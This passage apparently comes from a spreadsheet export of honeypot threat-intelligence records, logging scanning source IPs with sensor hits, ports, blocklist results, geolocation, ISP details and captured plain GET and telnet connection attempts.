    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;59750&amp;&amp;80&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="River Valley"/>
    <s v="11237888"/>
    <s v="NA"/>
    <s v="1.29606"/>
    <s v="103.836"/>
    <s v="17547"/>
    <s v="M1 NET LTD"/>
    <s v="M1 NET LTD"/>
    <s v="business"/>
    <s v="M1 NET LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:817e:cf41"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3378"/>
    <x v="3378"/>
    <s v="NA&amp;&amp;122-117-58-73.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T09:12:55"/>
    <d v="2024-04-03T13:11:00"/>
    <d v="2025-04-03T09:12:55"/>
    <n v="376"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;NA&amp;&amp;23&amp;&amp;3710&amp;&amp;8172&amp;&amp;9100"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:3a49"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3379"/>
    <x v="3379"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T09:08:58"/>
    <d v="2025-04-02T19:43:10"/>
    <d v="2025-04-03T09:08:58"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Khanna"/>
    <s v="1267016"/>
    <s v="NA"/>
    <s v="30.7055"/>
    <s v="76.222"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1863"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3380"/>
    <x v="3380"/>
    <s v="NA&amp;&amp;113-61-206-38.veetime.com"/>
    <x v="0"/>
    <d v="2025-04-03T08:58:24"/>
    <d v="2024-12-15T08:33:40"/>
    <d v="2025-04-03T08:58:24"/>
    <n v="879"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23&amp;&amp;35059&amp;&amp;35076&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1245"/>
    <s v="120.679"/>
    <s v="17809"/>
    <s v="VEE TIME CORP."/>
    <s v="EMAX"/>
    <s v="business"/>
    <s v="e-MAX NETWORK CORP."/>
    <s v="2008-11-06"/>
    <s v="EMAX-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:713d:ce26"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3381"/>
    <x v="3381"/>
    <s v="125-229-18-252.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:52:55"/>
    <d v="2024-07-06T22:08:00"/>
    <d v="2025-04-03T08:52:55"/>
    <n v="1098"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5900&amp;&amp;80&amp;&amp;445&amp;&amp;1080&amp;&amp;9100&amp;&amp;389&amp;&amp;25236&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de5:12fc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3382"/>
    <x v="3382"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:42:08"/>
    <d v="2025-04-03T08:42:08"/>
    <d v="2025-04-03T08:42:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_PJL_HC1"/>
    <s v="9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1aa:4203"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3383"/>
    <x v="3383"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:41:57"/>
    <d v="2025-02-14T13:48:55"/>
    <d v="2025-04-03T08:41:57"/>
    <n v="160"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H40"/>
    <s v="8443&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam']}"/>
    <n v="189"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="SC"/>
    <s v="Seychelles"/>
    <s v="16"/>
    <s v="La Rivière Anglaise"/>
    <s v="NA"/>
    <s v="Victoria"/>
    <s v="241131"/>
    <s v="NA"/>
    <s v="-4.62113"/>
    <s v="55.4522"/>
    <s v="401120"/>
    <s v="cheapy.host LLC"/>
    <s v="cheapy.host LLC"/>
    <s v="hosting"/>
    <s v="Internet Secuirty Cheapyhost"/>
    <s v="2017-02-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '154.90.63.129', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '193.57.138.110', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '156.244.8.69', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '38.60.209.6', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '156.244.37.11', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '38.54.79.122', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '193.57.136.113', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '154.93.37.45', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '185.255.123.181', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '185.234.67.80', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '38.60.224.106', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '109.123.229.33', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '149.102.153.168', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '45.14.244.111', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '94.131.8.76', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4fb:4873"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3384"/>
    <x v="3384"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:25:03"/>
    <d v="2025-03-27T09:29:51"/>
    <d v="2025-04-03T08:25:03"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="75"/>
    <s v="Apulia"/>
    <s v="Bari"/>
    <s v="Rutigliano"/>
    <s v="3168775"/>
    <s v="NA"/>
    <s v="41.01"/>
    <s v="17.0056"/>
    <s v="1267"/>
    <s v="RIPE Network Coordination Centre"/>
    <s v="INFOSTRADA"/>
    <s v="residential"/>
    <s v="WIND Telecomunicazioni S.p.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:972d:62a6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3385"/>
    <x v="3385"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T08:22:49"/>
    <d v="2024-12-24T16:57:03"/>
    <d v="2025-04-03T08:22:49"/>
    <n v="273"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="23&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0501"/>
    <s v="121.565"/>
    <s v="131596"/>
    <s v="TBC"/>
    <s v="TBCNET"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-12-17"/>
    <s v="TBCOM-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
